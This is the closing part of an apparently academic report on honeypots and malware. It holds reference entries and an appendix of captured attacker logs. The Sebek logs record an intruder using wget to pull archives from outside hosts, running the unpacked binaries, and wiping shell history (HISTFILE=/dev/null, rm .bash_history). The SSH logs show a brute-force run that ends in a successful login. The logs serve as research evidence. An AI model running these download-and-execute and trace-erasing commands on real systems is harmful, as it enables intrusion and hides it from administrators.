[91] A. Kulkarni and S. Bush. Active network management and kolmogorov
complexity, 2001. OpenArch 2001, Anchorage Alaska.
[92] S. Evans and B. Barnett, "Network Security Through Conservation of
Complexity," MILCOM, 2002, 2002.
[93] A. Kulkarni, S. Bush, and S. Evans, "Detecting distributed denial-of-service
attacks using kolmogorov complexity metrics," 2001. GE CRD Technical Report,
2001.
[94] M. Bailey, J. Oberheide, J. Andersen, Z.M. Mao, F. Jahanian, J. Nazario, and A.
Networks, "Automated Classification and Analysis of Internet Malware," Electrical
Engineering, 2007, pp. 1-18.
54
APPENDICES
APPENDIX - A
Sebek Logs
[2008-09-20 23:01:44 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:01:48 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#who
[2008-09-20 23:02:54 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cat /proc/cpuinfo
[2008-09-20 23:02:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:07 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:03:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#kill -9 10796
[2008-09-20 23:03:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:16 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:03:18 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#passwd
[2008-09-20 23:03:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#uname -a
[2008-09-20 23:04:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls[BS][BS][BS]last
[2008-09-20 23:04:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:04:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#history
[2008-09-20 23:04:27 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd .tmp
[2008-09-20 23:04:28 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /var/tmp
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:34 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www.idol.altervista.org/fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#tar xzvf fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd a
[2008-09-20 23:04:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#chmod +x *
[2008-09-20 23:05:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#./x 41.243 22
[2008-09-20 23:05:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#s
[2008-09-20 23:05:19 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:20 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#rm -rf a
[2008-09-20 23:05:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#[U-ARROW][BS]fas[BS][BS]ish.tgz
[2008-09-20 23:05:30 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:06:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:06:57 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:06:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:00 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd va/rmtp
[2008-09-20 23:07:04 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:08 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd v[BS]/tmp
[2008-09-20 23:07:09 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:07:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget members.lycos.co.uk/carbalano/bido.jpg
[2008-09-20 23:07:52 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#curl
[2008-09-20 23:07:58 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:08:14 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:08:17 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:08:18 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:08:32 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:10:30 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:12:45 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:12:46 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:12:53 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#tar zxvf fast.tar.gz
[2008-09-20 23:12:55 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-20 23:12:57 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#chmod +x *
[2008-09-20 23:13:00 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#./linux
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
55
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset BASHFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTSAVE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#history -n
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset WATCH
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#export HISTFILE=/dev/null
[2008-09-20 23:13:09 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#rm -rf .bash_history
[2008-09-21 02:23:12 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77360 COM:bash ]#Documents
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Do
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77371 COM:bash ]#Pictures
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Pic
[2008-09-21 02:23:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77379 COM:bash ]#/tmp
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd /t
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77387 COM:bash ]#fast
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fas
[2008-09-21 02:23:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:43 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:49 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#w
[2008-09-21 02:25:18 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:20 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-21 02:25:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd r
[2008-09-21 02:25:27 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:33 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77464 COM:bash ]#rinsult.e
[2008-09-21 02:25:34 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat rawa[BS][BS][BS]in
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:45 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls -l
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech3.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech1.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech2.users
[2008-09-21 02:25:58 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77493 COM:bash ]#mech1.users
[2008-09-21 02:25:59 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat me1
[2008-09-21 02:26:05 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[U-ARROW][L-ARROW][L-ARROW][LARROW][L-ARROW][LARROW][L-ARROW][L-ARROW][BS]2
[2008-09-21 02:26:13 Host:130.195.4.20 UID:1001 PID:1281079 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77507 COM:bash ]#linux
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat li
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[ESC][?1;2c[ESC][?1;2c[ESC][?1;2c
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#
[2008-09-21 02:26:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77519 COM:bash ]#m.pid
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.p
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.ses
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.set
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77536 COM:bash ]#m.ses
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.ses
[2008-09-21 02:27:23 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#e[BS]w
[2008-09-21 02:27:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#exit
SSH Logs
Sep 21 10:51:55 paul-desktop sshd[8838]: Failed password for invalid user t1na from 82.99.173.209 port 60061 ssh2
Sep 21 10:51:58 paul-desktop sshd[8840]: Failed password for invalid user alexis from 82.99.173.209 port 60193 ssh2
Sep 21 10:52:00 paul-desktop sshd[8842]: Failed password for invalid user t1na from 82.99.173.209 port 60291 ssh2
Sep 21 10:52:00 paul-desktop sshd[8844]: Failed password for invalid user a from 82.99.173.209 port 60360 ssh2
Sep 21 10:52:02 paul-desktop sshd[8846]: Failed password for invalid user art from 82.99.173.209 port 60489 ssh2
Sep 21 10:52:04 paul-desktop sshd[8848]: Failed password for invalid user slim from 82.99.173.209 port 60587 ssh2
Sep 21 10:52:04 paul-desktop sshd[8850]: Failed password for invalid user logic from 82.99.173.209 port 60675 ssh2
Sep 21 10:52:05 paul-desktop sshd[8852]: Failed password for invalid user b from 82.99.173.209 port 60709 ssh2
Sep 21 10:52:07 paul-desktop sshd[8854]: Failed password for invalid user shortcut from 82.99.173.209 port 60838 ssh2
Sep 21 10:52:07 paul-desktop sshd[8855]: Failed password for invalid user desiree from 82.99.173.209 port 60912 ssh2
Sep 21 10:52:08 paul-desktop sshd[8858]: Failed password for invalid user eminem from 82.99.173.209 port 60986 ssh2
Sep 21 10:52:08 paul-desktop sshd[8860]: Failed password for invalid user diablo from 82.99.173.209 port 32783 ssh2
56
Sep 21 10:52:10 paul-desktop sshd[8862]: Failed password for invalid user haitac from 82.99.173.209 port 32886 ssh2
(...)
Sep 21 10:52:48 paul-desktop sshd[9016]: Failed password for invalid user maria from 82.99.173.209 port 38176 ssh2
Sep 21 10:52:49 paul-desktop sshd[9020]: Failed password for invalid user natasha from 82.99.173.209 port 38439 ssh2
Sep 21 10:52:50 paul-desktop sshd[9028]: Failed password for invalid user skywalker from 82.99.173.209 port 38688
ssh2
Sep 21 10:52:50 paul-desktop sshd[9022]: Failed password for invalid user conter from 82.99.173.209 port 38607 ssh2
Sep 21 10:52:50 paul-desktop sshd[9023]: Failed password for invalid user ha from 82.99.173.209 port 38608 ssh2
Sep 21 10:52:50 paul-desktop sshd[9024]: Failed password for invalid user claudius from 82.99.173.209 port 38613 ssg2
Sep 21 10:52:51 paul-desktop sshd[9030]: Failed password for invalid user maria from 82.99.173.209 port 38732 ssh2
Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2
Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2
Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2
57